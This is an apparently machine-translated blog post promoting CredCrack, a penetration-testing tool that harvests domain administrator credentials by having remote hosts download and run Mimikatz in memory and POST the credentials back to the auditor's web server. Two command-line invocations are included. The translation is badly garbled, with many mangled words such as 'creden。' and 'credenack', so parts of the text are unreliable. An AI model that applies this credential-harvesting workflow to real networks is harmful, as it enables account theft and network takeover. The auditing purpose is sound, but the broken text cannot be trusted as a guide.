Get network administrator permissions within 17 seconds

Get network administrator permissions within 17 seconds

Many Security Auditors must obtain the permissions of the network administrator of the target network when conducting security audits on the target network environment. This usually makes us very excited and excited, because we know that after we get the permissions of the network administrator, it's just a good start. I have performed security audits on many networks, and I always spend a lot of time on obtaining the permissions of the network administrator. So I decided to find a way to speed up this process.

CredCrack was born

CredCrack is developed using the python language. This quick and convenient tool can help researchers directly obtain user creden from the memory of the target system, that is, it can directly display the network administrator account of the target network to you.

Working Mechanism of CredCrack

If you want to use CredCrack, you must configure the environment first. It automatically enables the apache service and deploys two files in the/var/www directory of your host. One file is fun. ps1, and the other is creds. php. In addition, Security Auditors also need to run a script to download the Invoke-Mimikatz.ps1 and manually Save the downloaded file to the same directory (/var/www ).

After all these operations are completed, CredCrack will verify the list of target systems provided to it by the Auditor to ensure that it can be connected to these systems, make sure that port 445 of the target host is enabled. After the detection is complete, CredCrack removes the target host that cannot be connected from the list, and then searches for the account information of the network administrator in the remaining target system in the list.

When the program obtains the network administrator account of the host in the list, CredCrack searches all hosts in the network for the Account creden。 of the network administrator. It will send an original powershell command to the remote host, requiring the remote host to connect to the auditor's system, and download and run fun in the remote host's memory. content in the ps1 file.

The fun. ps1 powershell script will execute mimikatz in the memory of the target system and send the user creden。 to the auditor's system through the POST request.

After that, CredCrack will continue searching for user credenack in the system of the target network. If the program obtains other user creden, the program will analyze and compare the network administrator account obtained previously. It will compare the user name of the account to determine whether the account is the administrator account of the target network.

Obtain the network administrator account creden17 within 17 seconds

CredCrack has two main functions. CredCrack uses the local administrator user creden。 provided by the researchers to enumerate the shared permissions of the system, and obtains the user creden。 through the network. One reason for using the enumeration sharing function is that the program needs to verify whether a given user has write or administrator permissions in the target system. You can view the following examples and programs to learn more about the syntax.

./Credcrack. py-d darkcove-u jblack-f hosts-es

One of the most valuable features of CredCrack is that it can obtain user creden. You can view the following examples and programs to learn more about the syntax.

./Credcrack. py-d darkcove-u jblack-f hosts-l 192.168.1.10

Great! Now it's time to use CredCrack. In the video below, researchers Alton use CredCrack and obtain the network administrator credential for the target network within 17 seconds. By the way, he may be the fastest typed person I have ever seen.

Conclusion

CredCrack is designed to help Security Auditors obtain the account creden。 of network administrators during security audits. This program helps me a lot in the Process of security audit, so I hope this program can also help more people. If you use CredCrack in Kali Linux, CredCrack does not depend on anything except the Invoke-Mimikatz.ps1.